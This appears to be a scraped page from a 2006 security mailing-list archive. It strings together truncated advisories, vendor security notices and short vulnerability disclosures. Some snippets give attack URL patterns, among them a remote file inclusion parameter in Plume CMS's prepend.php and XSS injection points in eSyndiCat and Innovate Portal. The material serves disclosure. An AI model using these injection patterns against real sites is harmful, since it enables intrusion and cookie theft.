[EMAIL PROTECTED] wrote:
Vendor: Plume CMS 1.1.10
Found By : D3nGeR
Scripit Site : http://plume-cms.net
in file [prepend.php]
;
include_once $_PX_config['manager_path'].'/inc/class.config.php'
code
http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:165
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1179-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 19th, 2006
*** rfdslabs security advisory ***
Title: OSU httpd for OpenVMS path and directory disclosure - is this a bug or a
feature? [RLSA_02-2006]
Versions: OSU/3.11alhpa, OSU/3.10a (probably others)
Vendor: David Jones, Ohio State University
eSyndiCat Portal System has an xss bug in search.php
can be exploited from web interface
http://www.example.com/[path]/search.php?what=[xss]search_top.x=0search_top.y=0search_top=GO
Discovered by meto5757
Rootshell Security Group
Background:
ARD allows unix commands to be remotely sent from an admin workstation. These
commands can be run as root, because the ard administrator can be given sudo
access. This exploit involves sending a unix command as root to install a
package that was copied to /tmp/. In this case, the
# Title: [EMAIL PROTECTED] 2.4.02 and below Multiple remote Command Execution
Vulnerabilities
# Vendor: [EMAIL PROTECTED]
# webiste : http://siteatschool.sourceforge.net/
# Version : = 2.4.02
# Severity: Critical
# Discovered by: Simo64 simo64_at_morx_org
# Exploit writting by: Simo Ben
Vulnerable:NextAge Cart Cross-Site Scripting Vulnerability.
Venedor site : http://www.nextagecart.com
Critical Level : Dangerous
Exploiting this issue could allow an attacker to steal cookie-based
authentication credentials and to launch other attacks.
Exploit :
PT News 1.7.8 (Search.php) XSS Vulnerability
---
PT News
Version: 1.7.8
Website URL:http://www.openbg.net/ptsite/
---
Discoved by Snake
[Unkn0wn Security Researcher]
The
#
#Pie Cart Pro = (Home_Path) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.doodlebabies.com/
#
Dear all,
I am pleased to announce the availability of a new white paper
Bypassing network access control (NAC) systems.
The paper discusses weaknesses and ways to bypass existing NAC
solutions.
From the abstract:
The threat of viruses, worms, information theft and lack of control
of the
I fail to see how this affects PunBB. The first thing PunBB does after
receiving an uploaded avatar is:
move_uploaded_file($uploaded_file['tmp_name'],
$pun_config['o_avatars_dir'].'/'.$id.'.tmp')
After that, $uploaded_file['tmp_name'] isn't used anymore. Am I missing
something here or what?
Xss Founded in Innovate Portal Index.php
venedor : http://www.innovate-board.de
Example :
http://www.example.com/[path]/index.php?content=[xss]
Discoverd by meto5757
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1180-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 19th, 2006
So in order for this vulnerability to be exploited, the attacker needs
to have a local account on the machine correct? Your exploitation explanation
is a bit construed. Any more info / demostrations would be helpful.
-Erik
On 18 Sep 2006 21:26:52 -
[EMAIL PROTECTED] wrote:
Background:
New zero-day vulnerability in Microsoft PowerPoint has been disclosed.
This vulnerability is being exploited by Trojan horse Trojan.PPDropper.E.
This dropper type file reportedly works in all Windows systems,
but the vulnerability itself has been confirmed in PowerPoint 2000 Chinese
version.
===
Ubuntu Security Notice USN-349-1 September 19, 2006
gzip vulnerabilities
CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337,
CVE-2006-4338
===
A security issue
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200609-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
Sunbelt Software released a warning on a new IE 0day they detected
in-the-wild, to quote them:
The exploit uses a bug in VML in Internet Explorer to overflow a buffer
and inject shellcode. It is currently on and off again at a number of
sites.
Security researchers at Microsoft have been
FAQ document about the recently disclosed zero-day vulnerability in PowerPoint
is ready.
The document entitled as Microsoft PowerPoint 0-day Vulnerability FAQ -
September 2006, CVE-2006-
is located at my SecuriTeam Blogs section,
http://blogs.securiteam.com/?p=620
CVE name will be added
rPath Security Advisory: 2006-0170-1
Published: 2006-09-19
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
gzip=/[EMAIL PROTECTED]:devel//1/1.3.5-4-0.1
References:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
=
FreeBSD-SA-06:21.gzip Security Advisory
The FreeBSD Project
Topic:
22 matches
Mail list logo